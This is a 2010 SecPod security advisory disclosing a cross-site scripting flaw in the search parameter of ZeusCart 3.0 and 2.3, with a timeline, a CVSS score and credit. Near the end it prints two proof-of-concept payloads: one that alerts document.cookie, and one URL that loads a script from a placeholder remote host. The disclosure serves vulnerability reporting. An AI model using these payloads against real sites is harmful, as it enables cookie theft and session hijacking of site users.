#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability
SecPod Technologies (www.secpod.com)
Author Sooraj K.S
#######################################################################
SecPod ID: 1003 07/28/2010 Issue Discovered
07/30/2010 Vendor Notified
No Response from Vendor
Class: Cross-Site Scripting Severity: Medium
ZeusCart Ecommerce Shopping Cart Software is prone to cross-site scripting
vulnerability.
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.
Input passed via the 'search' parameter in a 'search' action in index.php is
not properly verified before it is returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site. This may allow the attacker to steal cookie-based
authentication credentials and to launch other attacks.
The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.
Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.
ZeusCart 3.0
ZeusCart 2.3
Tested on,
ZeusCart 3.0 and 2.3 (tested using Microsoft Internet Explorer browser)
http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt
1)Input this code in search box and click search
'"%22%20style=x:expression(alert(document.cookie))><"
This script executed only on Microsoft Internet Explorer browser when tested
on ZeusCart 3.0 and 2.3
2) This example worked on ZeusCart version 2.3
http://www.example.com/?do=search&search='"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>
Fix not available
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.